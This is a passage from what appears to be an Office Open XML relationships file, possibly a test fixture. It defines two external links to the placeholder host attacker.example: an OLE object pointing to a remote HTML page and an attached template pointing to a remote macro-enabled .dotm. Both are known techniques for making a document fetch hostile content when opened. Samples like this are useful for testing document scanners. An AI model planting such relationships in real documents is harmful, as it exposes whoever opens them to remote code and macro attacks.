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a>b" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="http://attacker.example/x.html!" TargetMode="External"/><Relationship Id='c' Type='http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate' Target='http://attacker.example/t.dotm' TargetMode='External'/></Relationships>
</file>